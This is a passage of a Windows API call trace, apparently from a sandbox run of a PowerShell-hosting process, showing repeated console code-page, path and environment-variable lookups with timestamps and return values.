GetLastError () returned 0xcb [0151.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5d8dea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.526] GetLastError () returned 0xcb [0151.675] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0151.675] GetLastError () returned 0xcb [0151.675] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5d8e400 | out: lpConsoleScreenBufferInfo=0x5d8e400) returned 1 [0151.675] GetLastError () returned 0xcb [0151.774] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.774] GetLastError () returned 0xcb [0151.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5d8df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.830] GetLastError () returned 0xcb [0151.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5d8df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.830] GetLastError () returned 0xcb [0151.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5d8df00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.830] GetLastError () returned 0xcb [0151.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.995] GetLastError () returned 0xcb [0152.115] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0152.115] GetLastError () returned 0xcb [0152.115] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x5d8eb14 | out: lpConsoleScreenBufferInfo=0x5d8eb14) returned 1 [0152.116] GetLastError () returned 0xcb [0152.268] GetConsoleOutputCP () returned 0x1b5 [0152.269] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea70, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea70) returned 0 [0152.269] GetLastError () returned 0xcb [0152.270] GetConsoleOutputCP () returned 0x1b5 [0152.270] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea70, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea70) returned 0 [0152.270] GetLastError () returned 0xcb [0152.270] GetConsoleOutputCP () returned 0x1b5 [0152.270] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.270] GetLastError () returned 0xcb [0152.270] GetConsoleOutputCP () returned 0x1b5 [0152.270] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.270] GetLastError () returned 0xcb [0152.270] GetConsoleOutputCP () returned 0x1b5 [0152.270] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.270] GetLastError () returned 0xcb [0152.270] GetConsoleOutputCP () returned 0x1b5 [0152.270] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.270] GetLastError () returned 0xcb [0152.270] GetConsoleOutputCP () returned 0x1b5 [0152.270] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.270] GetLastError () returned 0xcb [0152.270] GetConsoleOutputCP () returned 0x1b5 [0152.271] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.271] GetLastError () returned 0xcb [0152.271] GetConsoleOutputCP () returned 0x1b5 [0152.271] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.271] GetLastError () returned 0xcb [0152.271] GetConsoleOutputCP () returned 0x1b5 [0152.271] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.271] GetLastError () returned 0xcb [0152.271] GetConsoleOutputCP () returned 0x1b5 [0152.271] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.271] GetLastError () returned 0xcb [0152.271] GetConsoleOutputCP () returned 0x1b5 [0152.271] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.271] GetLastError () returned 0xcb [0152.271] GetConsoleOutputCP () returned 0x1b5 [0152.271] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.271] GetLastError () returned 0xcb [0152.271] GetConsoleOutputCP () returned 0x1b5 [0152.271] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.271] GetLastError () returned 0xcb [0152.271] GetConsoleOutputCP () returned 0x1b5 [0152.271] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.271] GetLastError () returned 0xcb [0152.271] GetConsoleOutputCP () returned 0x1b5 [0152.272] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.272] GetLastError () returned 0xcb [0152.272] GetConsoleOutputCP () returned 0x1b5 [0152.272] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.272] GetLastError () returned 0xcb [0152.272] GetConsoleOutputCP () returned 0x1b5 [0152.272] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.272] GetLastError () returned 0xcb [0152.272] GetConsoleOutputCP () returned 0x1b5 [0152.272] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.272] GetLastError () returned 0xcb [0152.272] GetConsoleOutputCP () returned 0x1b5 [0152.272] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.272] GetLastError () returned 0xcb [0152.272] GetConsoleOutputCP () returned 0x1b5 [0152.273] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.273] GetLastError () returned 0xcb [0152.273] GetConsoleOutputCP () returned 0x1b5 [0152.273] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.273] GetLastError () returned 0xcb [0152.273] GetConsoleOutputCP () returned 0x1b5 [0152.273] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.273] GetLastError () returned 0xcb [0152.273] GetConsoleOutputCP () returned 0x1b5 [0152.273] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.273] GetLastError () returned 0xcb [0152.273] GetConsoleOutputCP () returned 0x1b5 [0152.273] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.273] GetLastError () returned 0xcb [0152.273] GetConsoleOutputCP () returned 0x1b5 [0152.273] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.273] GetLastError () returned 0xcb [0152.273] GetConsoleOutputCP () returned 0x1b5 [0152.273] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.273] GetLastError () returned 0xcb [0152.273] GetConsoleOutputCP () returned 0x1b5 [0152.273] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.273] GetLastError () returned 0xcb [0152.274] GetConsoleOutputCP () returned 0x1b5 [0152.274] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.274] GetLastError () returned 0xcb [0152.274] GetConsoleOutputCP () returned 0x1b5 [0152.274] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.274] GetLastError () returned 0xcb [0152.274] GetConsoleOutputCP () returned 0x1b5 [0152.274] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.274] GetLastError () returned 0xcb [0152.274] GetConsoleOutputCP () returned 0x1b5 [0152.274] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.274] GetLastError () returned 0xcb [0152.274] GetConsoleOutputCP () returned 0x1b5 [0152.274] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.274] GetLastError () returned 0xcb [0152.274] GetConsoleOutputCP () returned 0x1b5 [0152.274] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.274] GetLastError () returned 0xcb [0152.274] GetConsoleOutputCP () returned 0x1b5 [0152.274] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.274] GetLastError () returned 0xcb [0152.274] GetConsoleOutputCP () returned 0x1b5 [0152.275] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.275] GetLastError () returned 0xcb [0152.275] GetConsoleOutputCP () returned 0x1b5 [0152.275] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.275] GetLastError () returned 0xcb [0152.275] GetConsoleOutputCP () returned 0x1b5 [0152.275] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.275] GetLastError () returned 0xcb [0152.275] GetConsoleOutputCP () returned 0x1b5 [0152.275] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.275] GetLastError () returned 0xcb [0152.275] GetConsoleOutputCP () returned 0x1b5 [0152.275] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.275] GetLastError () returned 0xcb [0152.275] GetConsoleOutputCP () returned 0x1b5 [0152.275] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.275] GetLastError () returned 0xcb [0152.275] GetConsoleOutputCP () returned 0x1b5 [0152.275] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.275] GetLastError () returned 0xcb [0152.275] GetConsoleOutputCP () returned 0x1b5 [0152.275] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.276] GetLastError () returned 0xcb [0152.276] GetConsoleOutputCP () returned 0x1b5 [0152.276] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.276] GetLastError () returned 0xcb [0152.276] GetConsoleOutputCP () returned 0x1b5 [0152.276] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.276] GetLastError () returned 0xcb [0152.276] GetConsoleOutputCP () returned 0x1b5 [0152.276] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.276] GetLastError () returned 0xcb [0152.276] GetConsoleOutputCP () returned 0x1b5 [0152.276] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.276] GetLastError () returned 0xcb [0152.276] GetConsoleOutputCP () returned 0x1b5 [0152.276] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.276] GetLastError () returned 0xcb [0152.276] GetConsoleOutputCP () returned 0x1b5 [0152.276] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.276] GetLastError () returned 0xcb [0152.276] GetConsoleOutputCP () returned 0x1b5 [0152.276] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.276] GetLastError () returned 0xcb [0152.276] GetConsoleOutputCP () returned 0x1b5 [0152.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.277] GetLastError () returned 0xcb [0152.277] GetConsoleOutputCP () returned 0x1b5 [0152.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.277] GetLastError () returned 0xcb [0152.277] GetConsoleOutputCP () returned 0x1b5 [0152.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.277] GetLastError () returned 0xcb [0152.277] GetConsoleOutputCP () returned 0x1b5 [0152.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.277] GetLastError () returned 0xcb [0152.277] GetConsoleOutputCP () returned 0x1b5 [0152.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.277] GetLastError () returned 0xcb [0152.277] GetConsoleOutputCP () returned 0x1b5 [0152.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.277] GetLastError () returned 0xcb [0152.277] GetConsoleOutputCP () returned 0x1b5 [0152.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.277] GetLastError () returned 0xcb [0152.277] GetConsoleOutputCP () returned 0x1b5 [0152.277] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.277] GetLastError () returned 0xcb [0152.278] GetConsoleOutputCP () returned 0x1b5 [0152.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.278] GetLastError () returned 0xcb [0152.278] GetConsoleOutputCP () returned 0x1b5 [0152.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.278] GetLastError () returned 0xcb [0152.278] GetConsoleOutputCP () returned 0x1b5 [0152.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.278] GetLastError () returned 0xcb [0152.278] GetConsoleOutputCP () returned 0x1b5 [0152.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.278] GetLastError () returned 0xcb [0152.278] GetConsoleOutputCP () returned 0x1b5 [0152.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.278] GetLastError () returned 0xcb [0152.278] GetConsoleOutputCP () returned 0x1b5 [0152.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.278] GetLastError () returned 0xcb [0152.278] GetConsoleOutputCP () returned 0x1b5 [0152.278] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.278] GetLastError () returned 0xcb [0152.278] GetConsoleOutputCP () returned 0x1b5 [0152.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.279] GetLastError () returned 0xcb [0152.279] GetConsoleOutputCP () returned 0x1b5 [0152.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.279] GetLastError () returned 0xcb [0152.279] GetConsoleOutputCP () returned 0x1b5 [0152.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.279] GetLastError () returned 0xcb [0152.279] GetConsoleOutputCP () returned 0x1b5 [0152.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.279] GetLastError () returned 0xcb [0152.279] GetConsoleOutputCP () returned 0x1b5 [0152.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.279] GetLastError () returned 0xcb [0152.279] GetConsoleOutputCP () returned 0x1b5 [0152.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.279] GetLastError () returned 0xcb [0152.279] GetConsoleOutputCP () returned 0x1b5 [0152.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.279] GetLastError () returned 0xcb [0152.279] GetConsoleOutputCP () returned 0x1b5 [0152.279] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.279] GetLastError () returned 0xcb [0152.279] GetConsoleOutputCP () returned 0x1b5 [0152.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.280] GetLastError () returned 0xcb [0152.280] GetConsoleOutputCP () returned 0x1b5 [0152.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.280] GetLastError () returned 0xcb [0152.280] GetConsoleOutputCP () returned 0x1b5 [0152.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.280] GetLastError () returned 0xcb [0152.280] GetConsoleOutputCP () returned 0x1b5 [0152.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.280] GetLastError () returned 0xcb [0152.280] GetConsoleOutputCP () returned 0x1b5 [0152.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.280] GetLastError () returned 0xcb [0152.280] GetConsoleOutputCP () returned 0x1b5 [0152.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.280] GetLastError () returned 0xcb [0152.280] GetConsoleOutputCP () returned 0x1b5 [0152.280] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.280] GetLastError () returned 0xcb [0152.280] GetConsoleOutputCP () returned 0x1b5 [0152.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.281] GetLastError () returned 0xcb [0152.281] GetConsoleOutputCP () returned 0x1b5 [0152.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea70, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea70) returned 0 [0152.281] GetLastError () returned 0xcb [0152.281] GetConsoleOutputCP () returned 0x1b5 [0152.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.281] GetLastError () returned 0xcb [0152.281] GetConsoleOutputCP () returned 0x1b5 [0152.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.281] GetLastError () returned 0xcb [0152.281] GetConsoleOutputCP () returned 0x1b5 [0152.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.281] GetLastError () returned 0xcb [0152.281] GetConsoleOutputCP () returned 0x1b5 [0152.281] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.281] GetLastError () returned 0xcb [0152.281] GetConsoleOutputCP () returned 0x1b5 [0152.282] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.282] GetLastError () returned 0xcb [0152.282] GetConsoleOutputCP () returned 0x1b5 [0152.282] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.282] GetLastError () returned 0xcb [0152.282] GetConsoleOutputCP () returned 0x1b5 [0152.282] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.282] GetLastError () returned 0xcb [0152.282] GetConsoleOutputCP () returned 0x1b5 [0152.282] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.282] GetLastError () returned 0xcb [0152.282] GetConsoleOutputCP () returned 0x1b5 [0152.282] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.282] GetLastError () returned 0xcb [0152.282] GetConsoleOutputCP () returned 0x1b5 [0152.282] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.282] GetLastError () returned 0xcb [0152.282] GetConsoleOutputCP () returned 0x1b5 [0152.282] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.282] GetLastError () returned 0xcb [0152.282] GetConsoleOutputCP () returned 0x1b5 [0152.282] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.282] GetLastError () returned 0xcb [0152.282] GetConsoleOutputCP () returned 0x1b5 [0152.283] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.283] GetLastError () returned 0xcb [0152.283] GetConsoleOutputCP () returned 0x1b5 [0152.283] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.283] GetLastError () returned 0xcb [0152.283] GetConsoleOutputCP () returned 0x1b5 [0152.283] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.283] GetLastError () returned 0xcb [0152.283] GetConsoleOutputCP () returned 0x1b5 [0152.283] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0152.283] GetLastError 